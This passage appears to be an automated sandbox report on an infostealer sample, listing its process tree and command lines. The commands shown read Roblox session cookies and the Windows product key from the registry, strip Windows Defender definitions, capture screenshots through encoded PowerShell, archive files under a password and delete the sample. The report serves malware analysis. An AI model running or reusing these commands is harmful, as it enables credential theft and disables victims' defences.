BUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	04:16:14
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
Imagebase:	0x7ff743930000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8540, Parent PID: 8516

General

Target ID:	51
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP"
Imagebase:	0x7ff7f34e0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7e8150000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	04:16:15
Start date:	05/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff6241e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff64c960000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff6241e0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8860, Parent PID: 8844

General

Target ID:	63
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7e8150000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8940, Parent PID: 8920

General

Target ID:	66
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	04:16:16
Start date:	05/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff630ed0000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	04:16:17
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 9024, Parent PID: 9012

General

Target ID:	69
Start time:	04:16:17
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	04:16:17
Start date:	05/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7e8150000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	04:16:17
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 9092, Parent PID: 9076

General

Target ID:	72
Start time:	04:16:17
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	04:16:18
Start date:	05/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7e8150000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	04:16:18
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	04:16:18
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	04:16:18
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7148, Parent PID: 7532

General

Target ID:	78
Start time:	04:16:18
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	04:16:18
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	04:16:18
Start date:	05/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7e8150000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	04:16:19
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff70f330000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	04:16:19
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	04:16:20
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	04:16:28
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	04:16:28
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	04:16:28
Start date:	05/01/2025
Path:	C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *
Imagebase:	0x7ff623dd0000
File size:	630'736 bytes
MD5 hash:	9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	04:16:29
Start date:	05/01/2025
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff6e05d0000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	04:16:29
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	04:16:29
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	04:16:29
Start date:	05/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff69bf10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	04:16:30
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	04:16:30
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	04:16:30
Start date:	05/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff69bf10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	04:16:31
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	04:16:31
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	04:16:31
Start date:	05/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff69bf10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	04:16:32
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	04:16:32
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	04:16:32
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	04:16:33
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	103
Start time:	04:16:33
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	104
Start time:	04:16:33
Start date:	05/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff69bf10000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	105
Start time:	04:16:34
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	106
Start time:	04:16:34
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	107
Start time:	04:16:34
Start date:	05/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	108
Start time:	04:16:36
Start date:	05/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe""
Imagebase:	0x7ff66a4e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	109
Start time:	04:16:36
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	110
Start time:	04:16:36
Start date:	05/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 3
Imagebase:	0x7ff69c740000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

